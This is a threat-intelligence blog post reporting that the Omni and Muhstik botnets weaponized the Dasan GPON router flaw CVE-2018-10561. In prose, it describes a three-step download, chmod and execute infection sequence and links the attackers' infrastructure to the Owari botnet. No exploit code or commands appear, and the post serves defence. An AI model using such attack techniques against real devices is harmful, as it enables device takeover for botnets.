CVE-2018–10561 Dasan GPON exploit weaponized in Omni and Muhstik botnets

Introduction

Almost two years since the inception of the Mirai attack, IoT attackers have shifted to use IoT exploits to take control of devices. The attackers are acting quickly on weaponizing one-day exploits, which are low hanging yet very delicious fruits. While discovering a zero-day in an IoT may consume time and resource, IoT attackers find it much more effective to track the publicly revealed exploits and to weaponize them as early as possible for making money.

Roughly a week ago, a critical exploit CVE-2018–10561 found in over a million GPON home routers was reported along with POC explanation. Attackers wasted little time on taking advantage of this exploit as NewSky Security has already observed two unrelated attempted attacks by now:

Attack 1: Omni botnet in the making

Few hours ago, NewSky Security got attacks that target the vulnerable GPON routers. The exploit has been weaponized in three steps to download and run Mirai style payload of different architectures, as shown in our attack logs below.

Step 1 : Payload downloaded from server

Step 2: Payload given executable permission via chmod

Step 3: Payload in action

Payloads hosted in attackers’ bin repository have a fresh timestamp as shown below.

Attacker’s bin repository

NewSky Security was able to contact the author of the Omni botnet in making. For verification, we challenged the proclaimed author with some questions that may only the botnet developer/admin has answers to, and we received correct answers. On condition of anonymity, the botnet author revealed that the Omni botnet is under construction, and he is working on the scanner and payloads. Since the botnet is still in development, it might not show all its behaviors at the moment.

He also mentioned that unlike other exploits, his new botnet wasn’t able to use the && operator to combine steps of downloading and running the payload because the exploit code was breaking. Hence, he designed a three-phrase attack, which explains why we were getting attacks in a sequence of three steps instead of a single shot.

Although the attacker disclosed a large number of devices that he already has control of, NewSky Security will be not mentioning the number as we can’t verify this claim. Although, hacking big amounts of devices is very possible as Shodan has already revealed more than a million number of GPON devices potentially susceptible to the hack.

The connection between Omni and Owari attacks

While analyzing the new Omni botnet, we observed a number of clues that indicate that the attacks are closely related to Owari botnet. The binary repository IP where Omni bins are hosted are already used by Owari before.

binary repository IP

Also, the IP resolves to 0day(.)life which already has been associated with Owari in our previous research. This leads us to conclude that Omni botnet is brewing in the same lab as Owari.

Fun fact: Presently 0day(.)life is hosting a bizarrely disturbing yet addictive meme video of bitconnect event. YouTube link is here.

Attack 2: Muhstik botnet adds Dasan GPON bug into its arsenal

Omni is not the only attack group to use the Dasan GPON vulnerability, as we observed that the infamous Muhstik botnet also deployed CVE-2018–10561 to attack our honeypots. Muhstik was discovered using DrupalGeddon2 as well as other exploits by 360 Netlab. In the first eight lines of the image below, we can see the Muhstik C2 deploying eight different exploits and the last line shows new GPON infection URL. With the C2 as well as the attack pattern being strikingly similar, there was enough evidence for us to conclude that CVE-2018–10561 is one of the latest weapons in the Muhstik botnet.

8 exploits and new GPON add-on in Muhstik botnet

In a tweet, 360 Netlab confirmed our findings:

Conclusion

The response time for IoT attackers (time between an IoT exploit released in public and attackers weaponizing them for their benefits) is decreasing rapidly. Attackers are acting quickly not only to win the race against potential updates/patches but also against fellow attackers as multiple threat actors try to own a device as soon as such exploits are made public.

Some people have been critical for the early vulnerability disclosure by VPNMentor before a patch was released. Interestingly, VPNMentor has taken matter in their own hands and they have come up with a patch of their own which can be accessed here.

NewSky Security threat intelligence platform is tracking the usage of CVE-2018–10561 and provides protection against the exploitation attempts via IoT Halo.

Ankit Anubhav, Principal Researcher, NewSky Security (NewSky Security)